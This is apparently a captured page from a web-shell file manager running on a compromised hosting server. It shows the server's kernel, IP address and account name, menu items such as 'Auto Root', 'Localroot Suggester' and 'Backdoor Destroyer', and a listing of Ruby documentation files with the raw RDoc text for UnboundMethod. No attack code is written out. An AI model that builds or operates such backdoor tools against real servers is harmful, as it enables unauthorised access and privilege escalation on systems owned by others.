Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.222
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ri /
system /
UnboundMethod /
Delete
Unzip
Name
Size
Permission
Date
Action
%3d%3d-i.ri
757
B
-rw-r--r--
2026-04-07 16:51
arity-i.ri
1.8
KB
-rw-r--r--
2026-04-07 16:51
bind-i.ri
1.04
KB
-rw-r--r--
2026-04-07 16:51
bind_call-i.ri
514
B
-rw-r--r--
2026-04-07 16:51
cdesc-UnboundMethod.ri
2.22
KB
-rw-r--r--
2026-04-07 16:51
clone-i.ri
577
B
-rw-r--r--
2026-04-07 16:51
eql%3f-i.ri
676
B
-rw-r--r--
2026-04-07 16:51
hash-i.ri
415
B
-rw-r--r--
2026-04-07 16:51
inspect-i.ri
1.6
KB
-rw-r--r--
2026-04-07 16:51
name-i.ri
327
B
-rw-r--r--
2026-04-07 16:51
original_name-i.ri
555
B
-rw-r--r--
2026-04-07 16:51
owner-i.ri
809
B
-rw-r--r--
2026-04-07 16:51
parameters-i.ri
897
B
-rw-r--r--
2026-04-07 16:51
source_location-i.ri
477
B
-rw-r--r--
2026-04-07 16:51
super_method-i.ri
440
B
-rw-r--r--
2026-04-07 16:51
to_s-i.ri
1.54
KB
-rw-r--r--
2026-04-07 16:51
Save
Rename
U:RDoc::NormalClass[iI"UnboundMethod:ET@I"Object;To:RDoc::Markup::Document:@parts[o;;[o:RDoc::Markup::Paragraph;[ I"ERuby supports two forms of objectified methods. Class Method is ;TI"Eused to represent methods that are associated with a particular ;TI"Bobject: these method objects are bound to that object. Bound ;TI"Emethod objects for an object can be created using Object#method.;To:RDoc::Markup::BlankLine o; ;[ I"FRuby also supports unbound methods; methods objects that are not ;TI"Fassociated with a particular object. These can be created either ;TI"Hby calling Module#instance_method or by calling #unbind on a bound ;TI"Dmethod object. The result of both of these is an UnboundMethod ;TI"object.;T@o; ;[I"CUnbound methods can only be called after they are bound to an ;TI"Bobject. That object must be a kind_of? the method's original ;TI"class.;T@o:RDoc::Markup::Verbatim;[I"class Square ;TI" def area ;TI" @side * @side ;TI" end ;TI" def initialize(side) ;TI" @side = side ;TI" end ;TI" end ;TI" ;TI"-area_un = Square.instance_method(:area) ;TI" ;TI"s = Square.new(12) ;TI"area = area_un.bind(s) ;TI"area.call #=> 144 ;T:@format0o; ;[I"FUnbound methods are a reference to the method at the time it was ;TI"Fobjectified: subsequent changes to the underlying class will not ;TI"affect the unbound method.;T@o;;[I"class Test ;TI" def test ;TI" :original ;TI" end ;TI" end ;TI"&um = Test.instance_method(:test) ;TI"class Test ;TI" def test ;TI" :modified ;TI" end ;TI" end ;TI"t = Test.new ;TI"%t.test #=> :modified ;TI"$um.bind(t).call #=> :original;T;0: @fileI"proc.c;T:0@omit_headings_from_table_of_contents_below0; 0;0[ [ [ [[I" class;T[[:public[ [:protected[ [:private[ [I" instance;T[[;[[I"==;TI"proc.c;T[I" arity;T@Z[I" bind;T@Z[I"bind_call;T@Z[I" clone;T@Z[I" eql?;T@Z[I" hash;T@Z[I"inspect;T@Z[I" name;T@Z[I"original_name;T@Z[I" owner;T@Z[I"parameters;T@Z[I"source_location;T@Z[I"super_method;T@Z[I" to_s;T@Z[;[ [;[ [ [U:RDoc::Context::Section[i 0o;;[ ; 0;0[@E@EcRDoc::TopLevel